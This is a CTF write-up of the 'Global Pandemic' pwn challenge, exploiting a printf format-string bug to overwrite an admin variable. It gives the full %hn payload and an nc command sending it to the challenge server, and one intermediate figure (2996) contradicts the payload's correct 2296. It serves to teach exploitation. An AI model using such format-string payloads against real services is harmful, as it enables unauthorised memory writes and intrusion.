Capture The Talent — Pwn Write-up : Global Pandemic

From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF was held. 🏆Final ranking: 1/52

Let’s go for a writeup of the Global Pandemic challenge in Pwn category.

Thanks to egotistical for creating the challenges and managing the CTF!

Global Pandemic

This challenge give us the c code and the compiled binary.

Global_Pandemic.c

The Vulnerability

First, at looking at the c code we can see the printf(pass); line.

That is a Format Bug String. We can check that if we try to compile with clang.

Compilation of the c code with clang.

Pre-requirements

To obtain the flag, we need to change the admin variable value. To do that, we need to write 0xb4dbabe3 were the address of admin is.

A fast, checksec teel us that the binary is compiled with No PIE so the variable address are always the same.

I can do a nm on the binary to get the admin variable address.

Address of admin variable.

Offset

Now, we need to know at which offset our string is on the stack to write the data in.

Offset of our input in stack.

As you can see above, the indexes 12 and 13 is 41414141 and 42424242 which is respectively our AAAA and BBBB input.

Perfect, we have our offset, now we can create the payload.

Payload

We can create three payload like:

  • [admin_address]%[value]c%[index]$n
  • [admin_address][admin_address+2]%[value]c%[index]$hn%[value]c%[index]$hn
  • [admin_address][admin_address+1][admin_address+2][admin_address+3]%[value]c%[index]$hhn%[value]c%[index]$hhn%[value]c%[index]$hhn%[value]c%[index]$hhn

I personally prefer to use $hn to write 2 bytes. It is possible to write 1 byte with $hhn but the line is very long and 4 byte with $n but sometimes the number of byte written is too big for the program.

The first address of admin_address is 0x0804c02c, so admin_address+2 is 0x0804c02e .

First, I need to write 0xabe3 in admin_address.

To compute the value, I substract the bytes already write to the value I need to write.

I already write 8 bytes, admin_address + admin_address+2 which is 4 bytes per address.

So 0xabe3 — 8 = 43995.

Our payload looks like this for the moment : \x2c\xc0\x04\x08\x2e\xc0\x04\x08%43995c%12$hn.

I wrote the address of admin variable in little endian.

The end of the payload is like the first part. We need to write 0xb4db in admin_address+2.

So, I substract this value with the bytes already write.

0xb4db — 43995–8 = 2996

Now we have our full payload:

\x2c\xc0\x04\x08\x2e\xc0\x04\x08%43995c%12$hn%2296c%13$hn

We can send it to the challenge to get the flag.

$ python -c “print(‘\x2c\xc0\x04\x08\x2e\xc0\x04\x08%43995c%12\$hn%2296c%13\$hn’)” | nc 18.134.175.139 5555[snip]CTT{H0p3_y0u_h4d_fun_w1th_7h1s_1_XD}

Flag: CTT{H0p3_y0u_h4d_fun_w1th_7h1s_1_XD}

--

--

--

French CTF team

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Web Accessibility Made Easy

Ankr enables BNB Staking for Binance Smart Chain Testnet!

What I really learned at code school

Improving your Docker development experience with VSCode + Remote — Containers extension

Cool Regex performance hacks I bumped into

MLOps (part 1.0/20): Introduction to Kubernetes with examples and code

Deploy Aerospike and Trino based analytics platform using Docker

What if you had an opportunity to build a Core Banking System from scratch? (Part 1)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Les Pires Hat

Les Pires Hat

French CTF team

More from Medium

Containers In Kubernetes — Day 10

Embedded System Project #7: Bluetooth

Windows MDT as code — Part 2

Thoughts on securing the software supply chain for development organizations